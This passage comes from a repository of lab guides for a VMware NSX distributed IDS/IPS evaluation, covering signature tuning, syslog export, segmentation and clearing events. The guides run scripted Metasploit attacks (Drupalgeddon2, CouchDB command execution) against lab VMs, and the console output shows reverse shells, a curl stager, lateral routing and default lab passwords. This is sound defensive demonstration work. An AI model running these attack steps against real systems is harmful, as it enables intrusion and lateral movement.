37 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M2
38 | * ET WEB_SPECIFIC_APPS Possible Apache Struts OGNL Expression Injection (CVE-2017-5638) M3
39 | 
40 | 4. Note that the **affected product** for all these events is **Apache_Struts2** and the severity for all events is **high**.
41 | 5. Now we will turn off these signatures for the **Production** profiles as we are not running **Apache_Struts2** in our production environment.
42 | 6. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Profiles
43 | 7. Click the **3 dots** next to the **Production** profile and click **Edit** to edit the profile.
44 | 8. Click **Select** next to **High Severity Signatures**
45 | 9. In the **Filter** field, type **Apache_Struts2** to find all signatures related to Struts2. Tick the **Checkbox** on top of the exclusion screen to select all filtered signatures.
46 | 
47 | 10. Click **Add** to add the selected signatures to th exclusion list for the **Production** profile.
48 | 11. Click **Save** to save the **Production** profile.
49 |
50 | Now that we have tuned our Profile, we will try the failed exploit attempt again, and confirm this time the signatures don't fire.
51 |
52 | 12. From the already open console session with **External VM**, use the already configured **struts2_namespace_ognl** Metastploit module to launch the exploit attempt again.
53 | * Type **exploit** to initiate the exploit. If you had previously closed Metsploit, then repeat step #1 of this exercise instead to launch the exploit attempt
54 | 13. In NSX Manager, navigate to Security --> East West Security --> Distributed IDS --> Events
55 | 14. Confirm the total number of events or the number of times each **Apache_Struts2** signature fired has not increased.
56 | 
57 | 15. You have now completed this exercise.
58 |
59 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM
60 |
61 | > **Note**: In addition to sending IDS/IPS Events from each distributed IDS/IPS engine, you can send them directly to a Syslog collector or SIEM from each host. Events are sent in the EVE.JSON format for which many SIEMS have pre-existing parsers/dashboards.
62 |
63 | In this exercise, you will learn how to conigure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**. You can use the same or your own SIEM of choice.
64 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS evens to an aleady configured collector.
65 |
66 | 1. Login to lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
67 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
68 | 3. Click the **Edit** button
69 | 4. In the **Filter** field, type **loghost**
70 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
71 | 
72 | 6. Repeat the same for the remaining 2 hosts.
73 | 7. Click on **Firewall** in the same **System** menu
74 | 8. Click the **Edit** button
75 | 9. In the **Filter** field, type **syslog**
76 | 10. Tick the checkbox next to **syslog** to allow outbuound syslog from the host.
77 | 11. Repeat the same for the remaining 2 hosts.
78 | 
79 | 12. Open a terminal session to one of the lab hypervisors , login with **root**/**VMware1!** and execute the below commands to enable IDS log export via syslog
80 | * Type **nsxcli** to enter the NSX CLI on the host
81 | * Type **set ids engine syslogstatus enable** to enable syslog event export
82 | * Confirm syslog event export was succesfully enabled by running the command **get ids engine syslogstatus**
83 |
84 | ```console
85 | [root@localhost:~] nsxcli
86 | localhost> set ids engine syslogstatus enable
87 | result: success
88 |
89 | localhost> get ids engine syslogstatus
90 | NSX IDS Engine Syslog Status Setting
91 | --------------------------------------------------
92 | true
93 | ```
94 | 13. Login to your syslog collector/SIEM and confirm you are receiving logs form each host.
95 | 14. Configure a parser or a filter to only look at IDS events. You can for example filter on the string **IDPS_EVT**.
96 | 
97 | 15. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manaully cofiguring the **Metasploit modules**.
98 | 16. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Utype **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
99 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
100 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
101 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
102 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM RHOST on line 13 should be the IP address of the App2-APP-TIER VM
103 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
104 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
105 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
106 | 
107 |
108 | This comnpletes this exercise.
109 |
110 | ---
111 |
112 | [***Next Step: 9. Segmentation***](/docs/9-Segmentation.md)
113 |
--------------------------------------------------------------------------------
/docs/8-AdvancedConfiguration.md:
--------------------------------------------------------------------------------
1 |
2 | ## 8. Advanced Configuration
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | In this **optional** exercise, we will explore some more advanced options in the NSX Distributed IDS/IPS Configuration
6 |
7 | **Enable IDS/IPS event logging directly from each host to a syslog collector/SIEM**
8 |
9 | > **Note**: In addition to sending IDS/IPS Events from each distributed IDS/IPS engine, you can send them directly to a Syslog collector or SIEM from each host. Events are sent in the EVE.JSON format for which many SIEMS have pre-existing parsers/dashboards.
10 |
11 | In this exercise, you will learn how to conigure IDS event export from each host to your syslog collector or SIEM of choice. I will use **vRealize Log Insight**. You can use the same or your own SIEM of choice.
12 | We will not cover how to install **vRealize Log Insight** or any other logging platform, but the following steps will cover how to send IDS/IPS evens to an aleady configured collector.
13 |
14 | 1. Login to lab vCenter and click on **Hosts and Clusters**, then select one of the 3 hosts that were deployed.
15 | 2. Click the **Configure** Tab and Scroll down to **System**. Click **Advanced System Settings**
16 | 3. Click the **Edit** button
17 | 4. In the **Filter** field, type **loghost**
18 | 5. Enter the **IP address of your syslog server** in the **Syslog.global.logHost** value field and click **OK** to confirm.
19 | 
20 | 6. Repeat the same for the remaining 2 hosts.
21 | 7. Click on **Firewall** in the same **System** menu
22 | 8. Click the **Edit** button
23 | 9. In the **Filter** field, type **syslog**
24 | 10. Tick the checkbox next to **syslog** to allow outbuound syslog from the host.
25 | 11. Repeat the same for the remaining 2 hosts.
26 | 
27 | 12. Open a terminal session to one of the lab hypervisors , login with **root**/**VMware1!** and execute the below commands to enable IDS log export via syslog
28 | * Type **nsxcli** to enter the NSX CLI on the host
29 | * Type **set ids engine syslogstatus enable** to enable syslog event export
30 | * Confirm syslog event export was succesfully enabled by running the command **get ids engine syslogstatus**
31 |
32 | ```console
33 | [root@localhost:~] nsxcli
34 | localhost> set ids engine syslogstatus enable
35 | result: success
36 |
37 | localhost> get ids engine syslogstatus
38 | NSX IDS Engine Syslog Status Setting
39 | --------------------------------------------------
40 | true
41 | ```
42 | 13. Login to your syslog collector/SIEM and confirm you are receiving logs form each host.
43 | 14. Configure a parser or a filter to only look at IDS events. You can for example filter on the string **IDPS_EVT**.
44 | 
45 | 15. Now we will run the lateral attack scenario we used in an earlier exercise again. This time, use the pre-defined script to run the attack instead of manaully cofiguring the **Metasploit modules**.
46 | 16. Before you execute the script, if you have not previously used it, you need to ensure the IP addresses match your environment. Utype **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
47 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
48 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
49 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
50 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM RHOST on line 13 should be the IP address of the App2-APP-TIER VM
51 | 17. After saving your changes, run the attack2 script by executing **sudo ./attack2.sh**.
52 | 18. Confirm a total of 3 meterpreter/command shell sessions have been established
53 | 19. Confirm your syslog server/SIEM has received the IDS events, directly from the host
54 | 
55 |
56 | This completes this exercise. Before moving to the next exercise, folow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
57 |
58 | ---
59 |
60 | [***Next Step: 9. Segmentation***](/docs/9-Segmentation.md)
61 |
--------------------------------------------------------------------------------
/docs/9-Segmentation.md:
--------------------------------------------------------------------------------
1 |
2 | ## 9. Segmentation
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | In this final exercise, we will leverage the **Distributed Firewall** in order to limit the attack surface.
6 | First, we will apply a **Macro-segmentation** policy which will isolate our **Production** environment and the applications deployed in it from the **Development** environment.
7 | Then, we will implement a **Micro-segmentation** policy, which will employ an **allow-list** to only allow the flows required for our applications to function and block everything else.
8 |
9 | **Macro-Segmentation: Isolating the Production and Development environnments**
10 |
11 | The goal of this exercise is to completley isolate workloads deployed in **Production** from workloads deployed in **Development**. All nested workloads were previously tagged to identify which of these environments they were deployed in, and earlier in this lab, you created groups for **Production Applications** and **Development Applications** respecively. In the next few steps, you will create the appropriate firewall rules to achieve this, and then run through the **lateral movement** attack scenario again to see how lateral movement has now been limited to a particular environment.
12 |
13 | ***Create a Distributed Firewall Environment Category Policy***
14 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
15 | 2. Click on the **Environments(0)** Category tab.
16 | 3. Click **ADD POLICY**
17 | 4. Click **New Policy** and change the name of the policy to **Environment Isolation**
18 | 5. Check the checkbox next to the **Environment Isolation** Policy
19 | 6. Click **ADD RULE** twice, and configure the cnew new rules as per below setps
20 | 7. Rule 1
21 | * Name: **Isolate Production-Development**
22 | * Source: **Production Applications**
23 | * Destination: **Development Applications**
24 | * Services: **ANY**
25 | * Profiles: **NONE**
26 | * Applied To: **Production Applications** , **Development Applications**
27 | * Action: **Drop**
28 | 8. Rule 2
29 | * Name: **Isolate Development-Production**
30 | * Source: **Development Applications**
31 | * Destination: **Production Applications**
32 | * Services: **ANY**
33 | * Profiles: **NONE**
34 | * Applied To: **Production Applications** , **Development Applications**
35 | * Action: **Drop**
36 |
37 | 
38 |
39 | 9. Click **Publish** to publish these rules to the **Distributed Firewall**.
40 |
41 | ***Open a SSH/Console session to the External VM***
42 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
43 | * Username **vmware**
44 | * Password **VMware1!**
45 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
46 |
47 | ***Run through the the lateral attack scenario (again)***
48 |
49 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM** which will initiate the complete lateral attack scenario without needing any manual metasploit steps. If you prefer, you can also manually go though these steps (See the chapter on Lateral Movement Scenario)
50 |
51 | 1. If you have not previously used this script, you will need to modify it to reflect your environment. Type **sudo nano attack2.rc** and replace the **RHOST** and **LHOST** IP addresses accordingly to match with the IP addresses in your environment.
52 | * **RHOST** on line 3 should be the IP address of the App1-WEB-TIER VM
53 | * **SUBNET** on line 6 (route add) should be the Internal Network subnet
54 | * **LHOST** on line 9 should be the IP address of the External VM (this local machine)
55 | * **RHOST** on line 10 should be the IP address of the App1-APP-TIER VM
56 | * **RHOST** on line 13 should be the IP address of the App2-APP-TIER VM
57 | 2. Type **CTRL-O** and confirm to save your changes, then **CTRL-X** to exit **Nano**.
58 | 3. Type **sudo ./attack2.sh** to run the attack scenario
59 |
60 | > **Note**: This scripted attack does not upgrade shell sessions to meterpreter sessions nor does it interact with the sessions. To interact with the established sessions, but it will cause the same signatures to fire on the NSX IDS/IPS.
61 |
62 | ```console
63 |
64 | vmware@ubuntu:~$ sudo ./attack2.sh
65 | [sudo] password for vmware:
66 | [*] Starting thE Metasploit Framework console...\
67 |
68 | Call trans opt: received. 2-19-98 13:24:18 REC:Loc
69 |
70 | Trace program: running
71 |
72 | wake up, Neo...
73 | the matrix has you
74 | follow the white rabbit.
75 |
76 | knock, knock, Neo.
77 |
78 | (`. ,-,
79 | ` `. ,;' /
80 | `. ,'/ .'
81 | `. X /.'
82 | .-;--''--.._` ` (
83 | .' / `
84 | , ` ' Q '
85 | , , `._ \
86 | ,.| ' `-.;_'
87 | : . ` ; ` ` --,.._;
88 | ' ` , ) .'
89 | `._ , ' /_
90 | ; ,''-,;' ``-
91 | ``-..__``--`
92 |
93 | https://metasploit.com
94 |
95 |
96 | =[ metasploit v5.0.95-dev ]
97 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
98 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
99 | + -- --=[ 7 evasion ]
100 |
101 | Metasploit tip: Search can apply complex filters such as search cve:2009 type:ex ploit, see all the filters with help search
102 |
103 | [*] Processing attack2.rc for ERB directives.
104 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
105 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
106 | resource (attack2.rc)> set RHOST 192.168.10.101
107 | RHOST => 192.168.10.101
108 | resource (attack2.rc)> set RPORT 8080
109 | RPORT => 8080
110 | resource (attack2.rc)> exploit -z
111 | [*] Started reverse TCP handler on 10.114.209.151:4444
112 | [*] Sending stage (38288 bytes) to 192.168.10.101
113 | [*] Meterpreter session 1 opened (10.114.209.151:4444 -> 192.168.10.101:36632) a t 2020-08-18 09:23:54 -0500
114 | [*] Session 1 created in the background.
115 | resource (attack2.rc)> route add 192.168.20.0/24 1
116 | [*] Route added
117 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
118 | [*] Using configured payload linux/x64/shell_reverse_tcp
119 | resource (attack2.rc)> set LPORT 4445
120 | LPORT => 4445
121 | resource (attack2.rc)> set LHOST 10.114.209.151
122 | LHOST => 10.114.209.151
123 | resource (attack2.rc)> set RHOST 192.168.20.100
124 | RHOST => 192.168.20.100
125 | resource (attack2.rc)> exploit -z
126 | [*] Started reverse TCP handler on 10.114.209.151:4445
127 | [*] Generating curl command stager
128 | [*] Using URL: http://0.0.0.0:8080/4u4h7sj6qJrKq
129 | [*] Local IP: http://10.114.209.151:8080/4u4h7sj6qJrKq
130 | [*] 192.168.20.100:5984 - The 1 time to exploit
131 | [*] Client 10.114.209.148 (curl/7.38.0) requested /4u4h7sj6qJrKq
132 | [*] Sending payload to 10.114.209.148 (curl/7.38.0)
133 | [*] Command shell session 2 opened (10.114.209.151:4445 -> 10.114.209.148:20667) at 2020-08-18 09:24:20 -0500
134 | [+] Deleted /tmp/zzdlnybu
135 | [+] Deleted /tmp/ltvyozbf
136 | [*] Server stopped.
137 | [*] Session 2 created in the background.
138 | resource (attack2.rc)> set LPORT 4446
139 | LPORT => 4446
140 | resource (attack2.rc)> set RHOST 192.168.20.101
141 | RHOST => 192.168.20.101
142 | resource (attack2.rc)> exploit -z
143 | [*] Started reverse TCP handler on 10.114.209.151:4446
144 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and w e couldn't continue to exploit.
145 | [*] Exploit completed, but no session was created.
146 | ```
147 |
148 | 4. Type **sessions -l** to confirm that this time, although the script tried to exploit the **APP1-WEB-TIER** then laterally move to **APP1-APP-TIER** and then move once more to **APP2-APP-TIER** only 2 reverse shell sessions were established
149 | * One from the **APP1-WEB-TIER** VM
150 | * One from the **APP1-APP-TIER** VM
151 |
152 | > **Note**: The exploit of the **APP2-APP-TIER** VM failed, because the Distributed Firewall policy you just configured isolated the **APP2** workloads that are part of the **Development Applications** Group (Zone) from the **APP1** workloads which are part of the **Production Applications** Group (Zone).
153 |
154 | ```console
155 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
156 |
157 | Active sessions
158 | ===============
159 |
160 | Id Name Type Information Connection
161 | -- ---- ---- ----------- ----------
162 | 1 meterpreter php/linux www-data (33) @ 273e1700c5be 10.114.209.151:4444 -> 192.168.10.101:36632 (192.168.10.101)
163 | 2 shell x64/linux 10.114.209.151:4445 -> 10.114.209.148:20667 (192.168.20.100)
164 | ```
165 |
166 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
167 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
168 | 2. Confirm 4 signatures have fired:
169 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
170 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
171 | * Signature for **Apache CouchDB Remote Code Execution**, with **APP-1-WEB-TIER** and **APP-1-APP-TIER** as Affected VMs
172 | * Signature for **Apache CouchDB Remote Privilege Escalation**, with **APP-1-WEB-TIER** and **APP-1-APP-TIER** as Affected VMs
173 |
174 | 
175 |
176 | > **Note**: Because the distributed firewall has isolated production from development workloads, we do not see the exploit attempt of the **APP2-APP-TIER** VM.
177 |
178 | This completes the Macro-segmentation exercise. Before moving to the next exercise, folow [these instructions](/docs/ClearingIDSEvents.md) to clear the IDS events from NSX Manager
179 |
180 | **Micro-Segmentation: Implementing a zero-trust network architecture for your applications**
181 |
182 | Now that we have isolated production from development workloads, we will micro-segment both of our applications by configuring an **allow-list** policty which explicitely only allows the flows required for our applications to fuction and blocks anything else. As a result, we will not only prevent lateral movement, but also prevent any reverse shell from being established.
183 |
184 | ***Create Granular Groups***
185 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
186 | 2. Click **ADD GROUP**
187 | 3. Create a Group with the below parameters. Click Apply when done.
188 | * Name **APP1-WEB**
189 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
190 | 
191 | 3. Create another Group with the below parameters. Click Apply when done.
192 | * Name **APP1-APP**
193 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-1 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
194 | 4. Create another Group with the below parameters. Click Apply when done.
195 | * Name **APP2-WEB**
196 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals Web-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
197 | 5. Create another Group with the below parameters. Click Apply when done.
198 | * Name **APP2-APP**
199 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals APP-2 Scope Application** AND **Virtual Machine Tag Equals App-Tier Scope Tier** (click the **+** icon to specify the **AND** condition between the criteria).
200 |
201 | 6. Confirm previously deployed VMs became a member of appropriate groups due to applied tags. Click **View Members** for the 4 groups you created and confirm
202 | * Members of **APP1-WEB**: **APP-1-WEB-TIER**
203 | * Members of **APP1-APP**: **APP-1-APP-TIER**.
204 | * Members of **APP2-WEB**: **APP-2-WEB-TIER**
205 | * Members of **APP1-WEB**: **APP-2-APP-TIER**.
206 |
207 | ***Create a Distributed Firewall Application Category Policy***
208 | 1. In the NSX Manager UI, navigate to Security --> Distributed Firewall
209 | 2. Click on the **Application(1)** Category tab.
210 | 3. Click **ADD POLICY**
211 | 4. Click **New Policy** and change the name of the policy to **APP1 Micro-Segmentation**
212 | 5. Check the checkbox next to the **APP1 Micro-Segmentation** Policy
213 | 6. Click **ADD RULE** twice, and configure the new new rules as per below steps
214 | 7. Rule 1
215 | * Name: **WEB-TIER-ACCESS**
216 | * Source: **Any**
217 | * Destination: **APP1-WEB**
218 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
219 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
220 | * Applied To: **APP1-WEB**
221 | * Action: **Allow**
222 | 8. Rule 2
223 | * Name: **APP-TIER-ACCESS**
224 | * Source: **APP1-WEB**
225 | * Destination: **APP1-APP**
226 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
227 | * Applied To: **APP1-WEB** , **APP1-APP**
228 | * Action: **Allow**
229 | 3. Now that we micro-segmented APP1, let's do the same for APP2. Click **ADD POLICY**
230 | 4. Click **New Policy** and change the name of the policy to **APP2 Micro-Segmentation**
231 | 5. Check the checkbox next to the **APP2 Micro-Segmentation** Policy
232 | 6. Click **ADD RULE** twice, and configure the new new rules as per below steps
233 | 7. Rule 1
234 | * Name: **WEB-TIER-ACCESS**
235 | * Source: **Any**
236 | * Destination: **APP2-WEB**
237 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
238 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
239 | * Applied To: **APP2-WEB**
240 | * Action: **Allow**
241 | 8. Rule 2
242 | * Name: **APP-TIER-ACCESS**
243 | * Source: **APP2-WEB**
244 | * Destination: **APP2-APP**
245 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
246 | * Applied To: **APP2-WEB** , **APP2-APP**
247 | * Action: **Allow**
248 | 9. We now have configured the appropriate allow-list policy for APP1 and APP2. Now we can change the default Distributed Firewall action from **Allow** to **Drop** in order to block all traffic except for the traffic we just allowed for our applications to function.
249 | 10. Click the down arrow next to the **Default Layer3 Section** Policy and change the action of the **Default Layer 3 rule** from **Allow** to **Drop**
250 | 11. Click **PUBLISH** to save and publish your changes.
251 |
252 | 
253 |
254 | ***Open a SSH/Console session to the External VM***
255 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
256 | * Username **vmware**
257 | * Password **VMware1!**
258 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
259 |
260 | ***Run through the the lateral attack scenario (again)***
261 |
262 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM** which will initiate the complete lateral attack scenario without needing any manual metasploit steps. If you prefer, you can also manually go though these steps (See the chapter on Lateral Movement Scenario)
263 |
264 | 1. Type **sudo ./attack2.sh** to run the attack scenario
265 |
266 | ```console
267 | vmware@ubuntu:~$ ./attack2.sh
268 | [sudo] password for vmware:
269 |
270 |
271 | Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
272 | EFLAGS: 00010046
273 | eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
274 | esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
275 | ds: 0018 es: 0018 ss: 0018
276 | Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
277 |
278 |
279 | Stack: 90909090990909090990909090
280 | 90909090990909090990909090
281 | 90909090.90909090.90909090
282 | 90909090.90909090.90909090
283 | 90909090.90909090.09090900
284 | 90909090.90909090.09090900
285 | ..........................
286 | cccccccccccccccccccccccccc
287 | cccccccccccccccccccccccccc
288 | ccccccccc.................
289 | cccccccccccccccccccccccccc
290 | cccccccccccccccccccccccccc
291 | .................ccccccccc
292 | cccccccccccccccccccccccccc
293 | cccccccccccccccccccccccccc
294 | ..........................
295 | ffffffffffffffffffffffffff
296 | ffffffff..................
297 | ffffffffffffffffffffffffff
298 | ffffffff..................
299 | ffffffff..................
300 | ffffffff..................
301 |
302 |
303 | Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
304 | Aiee, Killing Interrupt handler
305 | Kernel panic: Attempted to kill the idle task!
306 | In swapper task - not syncing
307 |
308 |
309 | =[ metasploit v5.0.95-dev ]
310 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
311 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
312 | + -- --=[ 7 evasion ]
313 |
314 | Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
315 |
316 | [*] Processing attack2.rc for ERB directives.
317 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
318 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
319 | resource (attack2.rc)> set RHOST 192.168.10.101
320 | RHOST => 192.168.10.101
321 | resource (attack2.rc)> set RPORT 8080
322 | RPORT => 8080
323 | resource (attack2.rc)> exploit -z
324 | [*] Started reverse TCP handler on 10.114.209.151:4444
325 | [*] Exploit completed, but no session was created.
326 | resource (attack2.rc)> route add 192.168.20.0/24 1
327 | [-] Not a session: 1
328 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
329 | [*] Using configured payload linux/x64/shell_reverse_tcp
330 | resource (attack2.rc)> set LPORT 4445
331 | LPORT => 4445
332 | resource (attack2.rc)> set LHOST 10.114.209.151
333 | LHOST => 10.114.209.151
334 | resource (attack2.rc)> set RHOST 192.168.20.100
335 | RHOST => 192.168.20.100
336 | resource (attack2.rc)> exploit -z
337 | [*] Started reverse TCP handler on 10.114.209.151:4445
338 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
339 | [*] Exploit completed, but no session was created.
340 | resource (attack2.rc)> set LPORT 4446
341 | LPORT => 4446
342 | resource (attack2.rc)> set RHOST 192.168.20.101
343 | RHOST => 192.168.20.101
344 | resource (attack2.rc)> exploit -z
345 | [*] Started reverse TCP handler on 10.114.209.151:4446
346 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
347 | [*] Exploit completed, but no session was created.
348 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) >
349 | ```
350 |
351 | 2. Type **sessions -l** to confirm that this time no reverse shell sessions were established.
352 |
353 | ```console
354 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
355 |
356 | Active sessions
357 | ===============
358 |
359 | No active sessions.
360 | ```
361 | > **Note**: The micro-segmentation policy applies allows the applictions to function but reduces the attack surface by preventing any communication to a service that is not explicitely allowed. As a result, while the initial exploit against the vulnerable drupal server was completed, no reverse shell was established as the distributed firewall is not allowing the APP1-WEB-TIER VM to establish a session to the external VM.
362 |
363 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
364 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
365 | 2. Confirm 2 signatures have fired:
366 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
367 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
368 |
369 | 
370 |
371 | > **Note**: While the initial DrupalGeddon exploit has completed, the distributed firewall has prevented the reverse shell from being established from APP-1-WEB-TIER. As a result, the attacker is unable to move laterally in the environment.
372 |
373 | This completes the NSX Distributed IDS/IPS PoV.
374 |
375 | ---
376 |
377 | [***Next Step: 10. Conclusion***](/docs/10-Conclusion.md)
378 |
--------------------------------------------------------------------------------
/docs/ClearingIDSEvents.md:
--------------------------------------------------------------------------------
1 |
2 | ## Clearing IDS Events from NSX Manager
3 | **For purposes of a demo or PoV, the below describes how IDS events can be cleared from NSX Manager**
4 |
5 |
6 |
7 | 1. Open your ssh client and initiate a session to NSX Manager. Login with the below credentials.
8 | * Username **root**
9 | * Password **VMware1!VMware1!**
10 | 2. Modify the **IP address (--host=10.114.209.149) in the below command to match the IP address of your NSX Manager**. Other values should not be changed
11 | ```console
12 | service idps-reporting-service stop
13 | java -cp /usr/share/corfu/lib/corfudb-tools-0.3.0.20200817041804.3917-shaded.jar org.corfudb.browser.CorfuStoreBrowserMain --host=10.114.209.149 --port=9040 --namespace=security_data_service --tablename=ids_event_data --operation=dropTable --tlsEnabled=true --keystore=/config/cluster-manager/corfu/private/keystore.jks --ks_password=/config/cluster-manager/corfu/private/keystore.password --truststore=/config/cluster-manager/corfu/public/truststore.jks --truststore_password=/config/cluster-manager/corfu/public/truststore.password
14 | curl -X PUT -H "Content-Type: application/json" "localhost:9200/security_data_service_metadata/_doc/security_data_service?pretty" -d' {"clusterId" : "-1"}'
15 | service idps-reporting-service start
16 | ```
17 | 3. IDS events will now be cleared from the NSX manager and the reporting service will restart. This may take a few moments, but when you login to the NSX Manager UI, you should see the IDS events have been removed. You may have to refresh the UI/webpage a few times. You can now close the ssh session.
18 | ---
19 |
20 | ***Next Step: Continue with the next exercise in the PoV Guide***
21 |
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_1.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_1.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_10.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_10.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_11.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_11.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_12.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_12.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_13.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_13.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_14.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_14.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_15.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/vmware-nsx/eval-docs-ids-ips/b9efc0717e42eebbc0725ce4a38a4638db44a268/docs/assets/images/IDPS_POC_15.PNG
--------------------------------------------------------------------------------
/docs/assets/images/IDPS_POC_16.PNG:
--------------------------------------------------------------------------------
